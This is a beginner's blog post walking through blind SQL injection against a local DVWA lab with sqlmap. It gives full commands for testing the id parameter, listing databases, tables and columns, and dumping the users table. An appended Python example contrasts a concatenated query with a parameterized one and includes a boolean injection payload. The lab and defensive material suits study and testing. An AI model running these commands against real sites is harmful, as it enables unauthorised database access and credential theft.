This is a record of my way of learning. I am starting from zero and am a beginner, so criticism from experts is welcome! This article is a collation of my own thoughts and is for reference only.
Log in to DVWA, set the level to low under DVWA Security, then open SQL Injection (Blind), enter any number and capture the request, and from the capture find the URL injection point and the cookie. (The capture tool used is Fiddler, so the capture process is not covered in detail here.)
Then open a cmd window and enter the commands.
The first step is to check whether the URL can be injected. The command is as follows:
sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9gakv1caa8u351290s6bupeqt6"
The -u parameter specifies the URL, and --cookie="cookie value" supplies the cookie.
The result shows that the URL can be injected.
The second step is to view all the databases:
sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9gakv1caa8u351290s6bupeqt6" --dbs
The third step is to view the current user:
sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9gakv1caa8u351290s6bupeqt6" --current-user
The fourth step is to view all the tables in the dvwa database:
sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9gakv1caa8u351290s6bupeqt6" -D dvwa --tables
The fifth step is to view the users table in the database, where --columns lists all the columns of the specified table:
sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9gakv1caa8u351290s6bupeqt6" -D dvwa -T users --columns
After the previous steps everyone is probably running out of patience, haha, but when the results come out there is still a sense of accomplishment. The sixth and last step: --dump outputs the information for all columns.
sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9gakv1caa8u351290s6bupeqt6" -D dvwa -T users --dump
Of course, the last screenshot does not show the complete output; you can continue to enter the!!
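Why the first step reports the id parameter as injectable, and what removes the finding, as an added example that is not part of the original post and is not DVWA's own code. It uses a constructed SQLite stand-in for a blind "exists / missing" endpoint; the table contents and the function names exists_vulnerable, exists_hardened and leaks_condition are assumptions.

```python
import sqlite3

def make_db():
    """Constructed sample data standing in for a users table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)", [(1, "admin"), (2, "gordon")])
    return db

def exists_vulnerable(db, user_id: str) -> bool:
    # Weak pattern: the request parameter is concatenated into the SQL text,
    # so a quote in the input becomes part of the statement.
    sql = "SELECT first_name FROM users WHERE user_id = '" + user_id + "'"
    try:
        return db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # blind endpoint: an SQL error looks like "missing"

def exists_hardened(db, user_id: str) -> bool:
    # Fix 1: allow-list validation. The id is an ASCII decimal number.
    if not (user_id.isascii() and user_id.isdigit()):
        return False
    # Fix 2: bound parameter. The input is passed as data, never as SQL text.
    sql = "SELECT first_name FROM users WHERE user_id = ?"
    return db.execute(sql, (int(user_id),)).fetchone() is not None

def leaks_condition(check, db) -> bool:
    """True if the endpoint's answer changes with a boolean condition
    appended to the id, which is the signal a blind-injection scan relies on."""
    answer_true = check(db, "1' AND '1'='1")
    answer_false = check(db, "1' AND '1'='2")
    return answer_true != answer_false

if __name__ == "__main__":
    db = make_db()
    print("concatenated query leaks:", leaks_condition(exists_vulnerable, db))
    print("parameterized query leaks:", leaks_condition(exists_hardened, db))
```

Re-running the first step against an endpoint fixed this way is a quick regression check: the scan should no longer report the parameter as injectable.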
This article is from the "learning Journey Ideas to organize" blog, please be sure to keep this source http://pieshusheng.blog.51cto.com/13106113/1946399
My Way of Learning (a) SQL blind learning article